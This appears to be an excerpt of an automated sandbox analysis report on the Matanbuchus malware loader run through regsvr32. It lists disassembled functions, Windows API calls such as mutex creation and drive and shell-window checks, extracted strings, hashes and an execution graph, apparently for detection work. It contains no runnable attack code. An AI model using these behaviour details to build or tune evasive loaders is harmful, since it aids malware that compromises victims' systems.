                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: DirectorySleepWindows
                                                • String ID: )$X$Z$t
                                                • API String ID: 1499897475-3436847989
                                                • Opcode ID: 1ac9e97676a06f7459a996af4f71db522573a8d2c248dadfa154baacd4979b29
                                                • Instruction ID: 5d002a31df826169504e805da7a0207f96811048080ca3dce6a30b1ef8fc773c
                                                • Opcode Fuzzy Hash: 1ac9e97676a06f7459a996af4f71db522573a8d2c248dadfa154baacd4979b29
                                                • Instruction Fuzzy Hash: 6A5100B5D04398CFDB24DFAAC88069DBBB1BF5A304F1081A9D558AB351E7348A95CF21
                                                Function 7F723E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723EFF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723F19
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723F33
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723F4D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F723F69
                                                • false, xrefs: 7F723F6E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: 18669042092a78572b473a7a87ec27dbc87ec74ab42f6ef02c3cc0d5c503c541
                                                • Instruction ID: c665379888d1b8b3749c102d1d452cc8e5196be179b7d4c0c1e613cbe920eee4
                                                • Opcode Fuzzy Hash: 18669042092a78572b473a7a87ec27dbc87ec74ab42f6ef02c3cc0d5c503c541
                                                • Instruction Fuzzy Hash: 1C214B72A00248EBCB08CFA4C980DEEB7B5FF88700F54855DB9516B245DB31AA09DB55
                                                Function 7F723D60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723DDF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723DF9
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723E13
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723E2D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F723E49
                                                • false, xrefs: 7F723E4E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: 1345e523274d92f314ec119e0bca6e92fbbac82797daabd1221d4d0093d997db
                                                • Instruction ID: 1056e7b07f519efbcbc1b73377bc921a92bbd51d83d9cfe31cfc5e1dd8b33665
                                                • Opcode Fuzzy Hash: 1345e523274d92f314ec119e0bca6e92fbbac82797daabd1221d4d0093d997db
                                                • Instruction Fuzzy Hash: A5214B72E00348EBCB04CFA4C980EEEB7B6FF88700F54856DA9516B245DB31AA19DB54
                                                Function 7F74402E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,7F74413B,7F741108,0000000C,7F7552A0,00000000,00000000,?,7F744388,00000021,FlsSetValue,7F75D860,7F75D868,7F7552A0), ref: 7F7440EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: cf0a46dfd94ffe3111029228cd971126dcdacb8a2778a6162b5e9cd617cab032
                                                • Instruction ID: 76289f4466d388af4b45affed76370099d029dd70a1a336caf74e1c373802aa2
                                                • Opcode Fuzzy Hash: cf0a46dfd94ffe3111029228cd971126dcdacb8a2778a6162b5e9cd617cab032
                                                • Instruction Fuzzy Hash: D6210B76905312EBCB129E758C45B6A3765EF41370B341161ED16AB290EB30FA35DAD0
                                                Function 6B63BD80 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 191sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 3472027048-435796455
                                                • Opcode ID: c98f7b2a1639047d47767a7b6ab8504b5cf1f09046addeccbaadf76a8750e894
                                                • Instruction ID: e54985919a55979fce36e2f79d727d54cd6dfb3efc82b8535de1325e30d81d5a
                                                • Opcode Fuzzy Hash: c98f7b2a1639047d47767a7b6ab8504b5cf1f09046addeccbaadf76a8750e894
                                                • Instruction Fuzzy Hash: 6E914AB1D043ACDFDF20CFAAC4816ADBBB2BB0A314F14819AE058A7345D7399954CF65
                                                Function 7F73F245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F73F265
                                                • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F73F277
                                                • swprintf.LIBCMT ref: 7F73F298
                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F73F2D5
                                                Strings
                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F73F28D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                • API String ID: 2943507729-1719349581
                                                • Opcode ID: a8e41d74acfaec1ea5f96477c915619ecac2acb724a19f2a20a37a6eb7c2a50c
                                                • Instruction ID: 5b01b8be1526dcaa06a10993bc480f6a8a0414096992c2f260d3c8c6a80bb365
                                                • Opcode Fuzzy Hash: a8e41d74acfaec1ea5f96477c915619ecac2acb724a19f2a20a37a6eb7c2a50c
                                                • Instruction Fuzzy Hash: 2111E97BD00219BBCF149B29CD44ADE737CDF84360F90455AF926DB041DA30AD418754
                                                Function 7F7407EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BDC47C31,7F7552A0,?,00000000,7F753C13,000000FF,?,7F74077A,7D83FC4D,?,7F74074E,7F7552A0), ref: 7F74081F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F740831
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,7F753C13,000000FF,?,7F74077A,7D83FC4D,?,7F74074E,7F7552A0), ref: 7F740853
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 4e8870962a127675e501e422074c59658e397e5c8df141b103aa55ae4b459d3b
                                                • Instruction ID: 0fa1fda2dc6e96376a5325a911a37acbe219416602fd74368ab9c13a131ffdd0
                                                • Opcode Fuzzy Hash: 4e8870962a127675e501e422074c59658e397e5c8df141b103aa55ae4b459d3b
                                                • Instruction Fuzzy Hash: 7501673691461AAFDB018F51CC05BAE77B8FB84725F140626EC17AB690DB74A924CA90
                                                Function 7F6E57E0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E5807
                                                • int.LIBCPMTD ref: 7F6E5820
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F6EAA36
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F6EAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F6E5867
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F6E58FB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: f3556af3355e22de888f0750b4bca4ef4573a40dc0135d0dea73ba47f78f4a39
                                                • Instruction ID: 1bd3cedffb5448354993840680d8a1970dd3eba6db4679c66bb0b8e2dcbb183d
                                                • Opcode Fuzzy Hash: f3556af3355e22de888f0750b4bca4ef4573a40dc0135d0dea73ba47f78f4a39
                                                • Instruction Fuzzy Hash: F741C7B5D01619DFCB04CF98D980AEEFBB1FF48310F204219E826A7394DB346A41CBA1
                                                Function 7F6E56A0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E56C7
                                                • int.LIBCPMTD ref: 7F6E56E0
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F6EAA36
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F6EAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F6E5727
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F6E57BB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: 5a20efecd6822c2d319af579ac8ea99a50add469ff43f05b23e89ce273a56c1d
                                                • Instruction ID: 46c8122e86fc7bfa0414715aa7b050eea62761a99939ac8e9d0f4fd714ac2d36
                                                • Opcode Fuzzy Hash: 5a20efecd6822c2d319af579ac8ea99a50add469ff43f05b23e89ce273a56c1d
                                                • Instruction Fuzzy Hash: 3241A7B9D01609DFCB04CF98D990AEEBBB5FF48310F204259E815A7394DB346A55CFA1
                                                Function 7F6E5920 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E5947
                                                • int.LIBCPMTD ref: 7F6E5960
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F6EAA36
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F6EAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F6E59A7
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F6E5A3B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: 9d28b4cc9b8c098d98dc5b2a5dca72cf918ae4e4768b9a3eefbbd1654781637d
                                                • Instruction ID: c1ffe03c73dd792af7d28f7ca4f25f99b48c70ce8933adc228bbda53f6f00f19
                                                • Opcode Fuzzy Hash: 9d28b4cc9b8c098d98dc5b2a5dca72cf918ae4e4768b9a3eefbbd1654781637d
                                                • Instruction Fuzzy Hash: D441A8B5D01609DFCB04CF98D980AEEFBB5FF48310F208259D915A7394D7346A45CBA1
                                                Function 7F72FDA4 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 7F72FDAB
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F72FDB6
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F72FE24
                                                  • Part of subcall function 7F72FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F72FF1F
                                                • std::locale::_Setgloballocale.LIBCPMT ref: 7F72FDD1
                                                • _Yarn.LIBCPMT ref: 7F72FDE7
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                • String ID:
                                                • API String ID: 1088826258-0
                                                • Opcode ID: 1d8eb469b6719c7ca81517f86dd01e3cdf7bbded7637f438336c9610b9ebef27
                                                • Instruction ID: 140f8825aaded3700b76426733e783e0bd991507800842eee49cfbaab8c9cef5
                                                • Opcode Fuzzy Hash: 1d8eb469b6719c7ca81517f86dd01e3cdf7bbded7637f438336c9610b9ebef27
                                                • Instruction Fuzzy Hash: E0017C7AB00255ABDB06DF24DA586BD7BB5FFC5221B284049D8229B380DF746B52CB81
                                                Function 7F734F92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F734F43,00000000,00000001,7FA355E4,?,?,?,7F7350E6,00000004,InitializeCriticalSectionEx,7F75AE34,InitializeCriticalSectionEx), ref: 7F734F9F
                                                • GetLastError.KERNEL32(?,7F734F43,00000000,00000001,7FA355E4,?,?,?,7F7350E6,00000004,InitializeCriticalSectionEx,7F75AE34,InitializeCriticalSectionEx,00000000,?,7F734E9D), ref: 7F734FA9
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F733D43), ref: 7F734FD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 444b812013b6376e68ee4edbbb89991e3e5d40ddbd42d3626101aa404d7ee330
                                                • Instruction ID: 1c1859f5569e94a646d8d1843c43f6b158aac49d0ea18be2144f1a8e68c52b2d
                                                • Opcode Fuzzy Hash: 444b812013b6376e68ee4edbbb89991e3e5d40ddbd42d3626101aa404d7ee330
                                                • Instruction Fuzzy Hash: EDE0923668430AB7EF021EA1DC06B083A65AF51761F384030F90EAE491E761E5329980
                                                Function 7F72F930 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7F72F717,?,?,?,7F72EF6C,?,0000000F,?,00000000,00000208), ref: 7F72F946
                                                • GetProcAddress.KERNEL32(00000000), ref: 7F72F94D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: RtlRandomEx$ntdll.dll
                                                • API String ID: 1646373207-4284430886
                                                • Opcode ID: 1c7197c36744fb5c9b1c26a23c7b2084665452312c440e1d3a75e42447519efc
                                                • Instruction ID: 35b76a9f21ef0bef0515527acb6630c389d519434c4e948dd1cfd69658218808
                                                • Opcode Fuzzy Hash: 1c7197c36744fb5c9b1c26a23c7b2084665452312c440e1d3a75e42447519efc
                                                • Instruction Fuzzy Hash: FDD09E7A61020A6FDA005BE6CC49A553FB8AF485653540411FD4DCB100D72596799A50
                                                Function 7F7055B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::exception::exception.LIBCONCRTD ref: 7F705868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: parse error$parse_error
                                                • API String ID: 2807920213-1820534363
                                                • Opcode ID: 439e9027e77160ca1022926875720382d4c76b40215f0dc6d27ea21e7b99a262
                                                • Instruction ID: ac7d23b3aa6dbc82bef5a298e59047c3910021a2049b0d325dfce519c8e3b5c5
                                                • Opcode Fuzzy Hash: 439e9027e77160ca1022926875720382d4c76b40215f0dc6d27ea21e7b99a262
                                                • Instruction Fuzzy Hash: F3A1FFB4D05258DFDB14CFA8C990BEEBBB1BF49300F208199E959AB341DB316A45CF94
                                                Function 7F6E7AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E7AF3
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F6E7BBF
                                                  • Part of subcall function 7F72FEA2: _Yarn.LIBCPMT ref: 7F72FEC1
                                                  • Part of subcall function 7F72FEA2: _Yarn.LIBCPMT ref: 7F72FEE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 3f8ee9f78b1b9edddc9f4134c87aba8908234defff3f62d19060d9773c83ae8b
                                                • Instruction ID: 741cc8d7c1ca8cedfb112472c69d5bfb7a4692d8f6ef84c8f12e581d6be93a26
                                                • Opcode Fuzzy Hash: 3f8ee9f78b1b9edddc9f4134c87aba8908234defff3f62d19060d9773c83ae8b
                                                • Instruction Fuzzy Hash: 454118B4E05289DFDB01CF98C954BAEFBF1BF49304F248199D414AB381C77A9A01CBA5

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:59
                                                Total number of Limit Nodes:2
                                                execution_graph 20147 7ebe7ab7 11 API calls 20227 7ec0e0d0 34 API calls std::ios_base::clear 20189 7ec047d4 GetPEB GetPEB GetPEB GetPEB 20191 7ec53fde 5 API calls std::_Locinfo::_Locinfo_ctor 20272 7ec415d8 15 API calls ___std_type_info_destroy_list 20273 7ebec1a0 35 API calls 3 library calls 20150 7ec042e4 6 API calls 20193 7ec43be0 16 API calls 5 library calls 20194 7ebf9f90 35 API calls 2 library calls 20129 7ec3caf0 GetSystemDirectoryW 20132 7ec28840 20129->20132 20131 7ec3cd96 20135 7ec29280 20132->20135 20134 7ec28a4e 20134->20131 20140 7ec295f0 20135->20140 20138 7ec29497 GetShellWindow 20139 7ec294a1 20138->20139 20139->20134 20141 7ec29817 GetProcessHeap 20140->20141 20143 7ec2988d 20141->20143 20144 7ec298fe GetDriveTypeA 20143->20144 20145 7ec29483 20143->20145 20144->20145 20145->20138 20145->20139 20279 7ec581ff 18 API calls 20234 7ebf8480 58 API calls 20196 7ec5c387 EnterCriticalSection 20283 7ec53d86 16 API calls __Getctype 20236 7ebf7cf0 14 API calls ___std_exception_copy 20157 7ebe2eed InitializeCriticalSectionEx 20284 7ec37d90 15 API calls 2 library calls 20237 7ec54890 LeaveCriticalSection _fwprintf_s 20238 7ec5dc98 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20121 7ec077a0 20122 7ec07a3f CreateMutexA 20121->20122 20124 7ec079a6 20121->20124 20123 7ec07b44 GetLastError 20122->20123 20126 7ec07a5a 20122->20126 20123->20126 20127 7ec07b55 20123->20127 20124->20122 20128 7ec07be4 CloseHandle 20127->20128 20128->20126 20286 7ec3c5a0 IsCharLowerA GetModuleFileNameW 20287 7ebe85d0 45 API calls 3 library calls 20243 7ebf70d0 47 API calls 20248 7ec5643b 14 API calls 20164 7ebe42c0 36 API calls Concurrency::cancellation_token_source::~cancellation_token_source 20291 7ebe3d30 26 API calls 20166 7ec5764a 16 API calls 5 library calls 20293 7ebf612f 9 API calls 20296 7ec1c160 43 API calls std::ios_base::clear 20174 7ec27660 45 API calls 2 library calls 20212 7ec0d370 32 API calls std::ios_base::clear 20263 7ec1a800 43 API calls std::ios_base::clear 20178 7ebe7a7b 12 API calls Concurrency::cancel_current_task 20216 7ec5730a 24 API calls 4 library calls 20180 7ec0da10 41 API calls std::ios_base::clear 20264 7ec3f011 11 API calls _memcpy_s 20265 7ec41417 4 API calls 2 library calls 20304 7ec3f11c 6 API calls _memcpy_s 20222 7ec08f30 10 API calls _memcpy_s 20305 7ec40936 23 API calls 2 library calls 20188 7ebf1e40 GetPEB 20223 7ebf2340 38 API calls 3 library calls

                                                Executed Functions

                                                Function 7EC077A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 331synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7EC07A47
                                                • GetLastError.KERNEL32 ref: 7EC07B44
                                                • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7EC07CBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateErrorHandleLastMutex
                                                • String ID: *$9mD$B$u${
                                                • API String ID: 4294037311-4130828584
                                                • Opcode ID: b2a48f09c93a2a662b40ba3ad8dbd567dae2fc81286a3a870beff72f0cc4503c
                                                • Instruction ID: ef72a88f4ba9bcd2952bf590036b77e99c30a3d3447d93667ac8bad66f41cb61
                                                • Opcode Fuzzy Hash: b2a48f09c93a2a662b40ba3ad8dbd567dae2fc81286a3a870beff72f0cc4503c
                                                • Instruction Fuzzy Hash: B4F14E7AD042A8CFDB14CFAACA917ADBBB1FF49304F10819AE559AB354D3344A81CF51
                                                Function 7EC3CAF0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 289COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7EC3CCEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: )$2$?$m$n $e
                                                • API String ID: 2188284642-1749247282
                                                • Opcode ID: bd75bbf54bede2b864e543cb42ab292bc76c2687e3a76aee6dbd3eecdef29144
                                                • Instruction ID: 3722e97aa56fc7d1268c6d71ed1b4bfd59ece667ca8b4e8c777fa9534cb9f506
                                                • Opcode Fuzzy Hash: bd75bbf54bede2b864e543cb42ab292bc76c2687e3a76aee6dbd3eecdef29144
                                                • Instruction Fuzzy Hash: 7FF14B7AD042A8CFDB24CF6ACA957ADBBB1BF49300F2080DAD159AB354D7745A80CF51
                                                Function 7EC29280 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 204COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 92 7ec29280-7ec2947e call 7ec295f0 94 7ec29483-7ec29495 92->94 95 7ec294a1-7ec294ab 94->95 96 7ec29497-7ec2949d GetShellWindow 94->96 97 7ec294c0-7ec294ec call 7ec40b50 95->97 98 7ec294ad-7ec294be 95->98 96->95 105 7ec294f7 97->105 106 7ec294ee-7ec294f5 97->106 99 7ec2950e-7ec29526 98->99 101 7ec29536-7ec29539 99->101 102 7ec29528-7ec29534 99->102 104 7ec2953e-7ec2956d 101->104 102->104 107 7ec29578 104->107 108 7ec2956f-7ec29576 104->108 109 7ec294fe-7ec29507 105->109 106->109 110 7ec2957f-7ec29585 107->110 108->110 109->99 111 7ec29590 110->111 112 7ec29587-7ec2958e 110->112 113 7ec29597-7ec295ea 111->113 112->113
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ShellWindow
                                                • String ID: 2$MNo name attribute $Q$\$c
                                                • API String ID: 2831631499-3960561890
                                                • Opcode ID: 7d9ab9945a16f6ad2ce651b8cd9f6d72342bb2a667e67924c2f63720bf391a7d
                                                • Instruction ID: 971bead5d3a06ebfdb11e99a5895b35c7c42ee04234c9a955cafef95a9c216ce
                                                • Opcode Fuzzy Hash: 7d9ab9945a16f6ad2ce651b8cd9f6d72342bb2a667e67924c2f63720bf391a7d
                                                • Instruction Fuzzy Hash: 10A14A7AD042E8CFDB14CFAAC6807ADBBB1BF49300F2081AAE559AB345D7744A44CF55
                                                Function 7EC295F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
